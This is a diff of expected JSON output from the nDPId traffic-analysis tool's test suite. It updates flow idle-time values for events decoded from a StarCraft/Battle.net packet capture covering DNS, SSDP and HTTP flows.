-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1437389956550,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2MAAIARVo\/AqAFkwKgB\/uXjADUANNVsy9IBAAABAAAAAAAAAjIyAjQwAzE5NAMxNzMHaW4tYWRkcgRhcnBhAAAMAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -41,12 +41,12 @@ 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1437389956552,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1437389956552,"pkt":"IImEa8W6hCYVPnXECABFAACPAABAAEARtavAqAH+wKgBZAA15eMAe9\/glcSBgAABAAIAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAABwAwADAABAABT2QAcEG1pbDAxczI1LWluLWYxMTAFMWUxMDADbmV0AMAMAAwAAQAAU9kAEg9taWwwMXMyNS1pbi1mMTTASg=="} 00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7440000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389961548,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389961548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389961548,"pkt":"hCYVPnXEIImEa8W6CABFAAApPndAAIAGAKbAqAFkQOm4vArHFGzE+CH9edXaGlAQAPyZDAAAAA=="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389961598,"pkt":"IImEa8W6hCYVPnXECABFAAA0aJ8AACgGbnNA6bi8wKgBZBRsCsd51doaxPgh\/oAQAXGUkwAAAQEFCsT4If3E+CH+"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7560000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389961548,"flow_last_seen":1437389961548,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389961548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1437389961548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389961548,"pkt":"hCYVPnXEIImEa8W6CABFAAApPndAAIAGAKbAqAFkQOm4vArHFGzE+CH9edXaGlAQAPyZDAAAAA=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1437389961598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389961598,"pkt":"IImEa8W6hCYVPnXECABFAAA0aJ8AACgGbnNA6bi8wKgBZBRsCsd51doaxPgh\/oAQAXGUkwAAAQEFCsT4If3E+CH+"} 00194{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","layer_type":35020,"global_ts_msec":1437389962628} 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":35020,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1437389961598,"pkt":"AYDCAAAOIImEa8W6iMwCBwQgiYRrxboEBwMgiYRrxboGAg4R\/gkAEg8BAwABAAD+BwASuwEAAQEAAA=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -54,69 +54,69 @@ 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00946{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1437389963467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGQAABAAAERxbzAqAH+7\/\/\/+pbNB2wBfPulTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KVVNOOiB1dWlkOjExMjY2NzM2LWZhNTktMTFlNC05YzlmLTg0MjYxNTNlNzVjNDo6dXBucDpyb290ZGV2aWNlDQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1437389963467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964518,"flow_last_seen":1437389964518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964518,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964518,"flow_last_seen":1437389964518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964518,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1437389964752,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964752,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2UAAIARVpbAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} 